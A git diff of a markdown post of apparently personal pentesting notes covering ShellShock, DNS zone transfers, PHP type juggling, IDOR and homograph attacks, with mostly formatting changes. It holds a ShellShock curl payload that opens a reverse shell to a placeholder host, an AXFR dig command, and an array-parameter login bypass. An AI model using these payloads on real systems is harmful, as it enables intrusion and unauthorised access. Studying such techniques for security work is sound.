--- a/_posts/notes/web/2022-04-25-others.md
+++ b/_posts/notes/web/2022-04-25-others.md
@@ -4,42 +4,50 @@ title: 'Notes | Web Others'
 permalink: /notes/web/others/
 ---
 
-# [](#header-4)ShellShock Attack
+# ShellShock Attack
 This vulnerability in Bash allows remote code execution without confirmation. A series of random characters, () { :; }; , confuses Bash because it doesn't know what to do with them, so by default, it executes the code after it.
 
 We can manipulate the **User-agent** to execute it, for example:
-{% highlight plain %}
-curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/myip/443 0>&1" http://example.com/
+{% highlight bash %}
+> curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/myip/443 0>&1" http://example.com/
 {% endhighlight %}
 
-# [](#header-4)Domain Zone Transfer (AXFR)
+---
+
+# Domain Zone Transfer (AXFR)
 AXFR offers no authentication, so any client can ask a DNS server for a copy of the entire zone. This means that unless some kind of protection is introduced, an attacker can get a list of all hosts for a domain, which gives them a lot of potential attack vectors.
 
 If we now one domian we can try:
-{% highlight plain %}
+{% highlight bash %}
 > dig @ip-domian domain.com axfr
 {% endhighlight %}
 This will list subdomain.
 ###### If we only have the ip we can use **/etc/hosts** to create the domains.
 
-# [](#header-4)Deserialization Attacks
+---
+
+# Deserialization Attacks
 **Serialization** is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications.
 **Deserialization** is the reverse of that process, taking data structured from some format, and rebuilding it into an object. Today, the most popular data format for serializing data is JSON. Before that, it was XML.
 
-# [](#header-4)Type Juggling
+---
+
+# Type Juggling
 With **Type Juggling** during the comparison of variables of different types, PHP will first convert them to a common, comparable type.
 
 For example we can send data like this:
-{% highlight plain %}
+{% highlight bash %}
 > curl -s -X POST --data 'usuario=admin&password=1' http://[ip] | html2text
 {% endhighlight %}
 We will probably get an error, but if we modify the content:
-{% highlight plain %}
+{% highlight bash %}
 > curl -s -X POST --data 'usuario=admin&password[]=1' http://[ip] | html2text
 {% endhighlight %}
 We can log in.
 
-# [](#header-4)Insecure direct object references (IDOR)
+---
+
+# Insecure direct object references (IDOR)
 IDOR are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly.
 
 If we have a webpage similar to:
@@ -54,7 +62,7 @@ Other example if we get a file in the url:
 {% endhighlight %}
 We can modify the value to get another user's file.
 
-# [](#header-4)Insecure direct object references (IDOR)
+# Insecure direct object references (IDOR)
 IDOR are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly.
 
 If we have a webpage similar to:
@@ -69,5 +77,7 @@ Other example if we get a file in the url:
 {% endhighlight %}
 We can modify the value to get another user's file.
 
-# [](#header-4)IDN homographic attack
+---
+
+# IDN homographic attack
 The internationalized domain name homograph attack is a way a malicious party may deceive computer users about what remote system they are communicating with, by exploiting the fact that many different characters look alike. For example, a regular user of example.com may be lured to click a link where the Latin character "a" is replaced with the Cyrillic character "а". This kind of spoofing attack is also known as script spoofing.
